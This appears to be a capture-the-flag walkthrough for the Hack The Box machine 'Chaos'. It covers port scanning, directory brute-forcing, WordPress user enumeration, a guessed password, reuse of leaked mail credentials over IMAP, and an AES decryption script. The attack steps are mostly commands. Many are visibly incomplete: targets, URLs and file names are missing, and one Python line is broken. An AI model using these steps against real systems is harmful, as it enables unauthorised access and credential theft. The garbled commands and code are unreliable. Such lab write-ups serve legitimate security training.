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Last active June 2, 2019 20:34
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Hack The Box - Chaos


  • Port scanning
  • Service enumeration
  • Wordpress user enumeration
  • IMAP commands
  • Python coding
  • HTTP Proxy: Intercept, modify, repeat


  • nmap
  • gobuster OR dirbuster OR dirb
  • wpscan
  • ncat OR openssl
  • ncat OR nc
  • base64
  • curl
  • Burp


  1. Scan for ports and services
    # Use nmap to find available TCP ports quickly
    $ ports=$( \
        nmap \
             -p- \
             --min-rate=1000 \
             -T4 \
        | grep ^[0-9] \
        | cut -d '/' -f 1 \
        | tr '\n' ',' \
        | sed s/,$// \
    # Scan found ports for services
    $ nmap \
           -p ${ports} \
           -sV \
           -sC \
  2. Notice we can't hit port 80 by IP, so likely name based virtual hosting going on
    $ curl
    <h1><center><font color="red">Direct IP not allowed</font></center></h1>
  3. Add an entry to the hosts file to allow for name based virtual hosting
    echo ' chaos.htb' >> /etc/hosts
  4. Naivgate to http://chaos.htb and notice the site is now served
  5. Let's dry dirbuster/gobuster to look for other endpoints
    $ gobuster -u \
               -w directory-list-2.3-medium.txt \
               -t 100 \
               -x php
    $ gobuster -u http://chaos.htb/ \
               -w directory-list-2.3-medium.txt \
               -t 100 \
               -x php
  6. We find a /wp endpoint on, so browse to it and notice a wordpress site with a password field
  7. Because it is a wordpress site, let's run wpscan against it
    $ wpscan --url --enumerate
  8. A single username was enumerated by wpscan named human. Enter human as the password to the wordpress page and it works!
  9. The first post we see shows credentials for a user named ayush. Record them somewhere.
  10. Let's use ncat OR openssl to try to connect to the IMAP service we found with nmap ealier
    # Either use ncat (like nc/netcat but with ssl support)
    $ ncat --ssl 993
    # Use openssl
    $ openssl s_client -connect
  11. Use IMAP commands to find an email sitting in the Drafts folder
    a login ayush jiujitsu
    b select inbox
    c list "" *
    d select Drafts
  12. Copy and paste both base64 strings from the attachments of the draft email into 2 files
    $ vim
    $ vim enim_msg.txt.base64
  13. Decode the base64 into 2 new files
    $ base64 -d | tee
    $ base64 -d enim_msg.txt.base64 | tee enim_msg.txt
  14. Notice that the .txt file is an encrypted file and the .py file was likely used to encrypt it.
  15. Edit the script and add a decrypt method:
    $ vim
    Add a method like the following
    def decrypt(key, fileName):
      # Read in the file
      fileContents = open(fileName).read()
      # Grab first 16-bytes which contain the file size
      fileSize = fileContents[:16]
      # Grab next 16-bytes which contain the initialization vector (IV)
      IV = fileContents[16:32]
      # The rest of the bytes represent the encrypted content
      encrypted = fileContents[32:]
      # Create an AES decryption object and call decrypt on the encrypted content
      decryptor =, AES.MODE_CBC, IV)
      print decryptor.decrypt(encrypted)
    And add this to the bottom of the script to call the new decrypt method, using sahay as the key (based on the email body)
    decrypt(getKey("sahay"), "enim_msg.txt")
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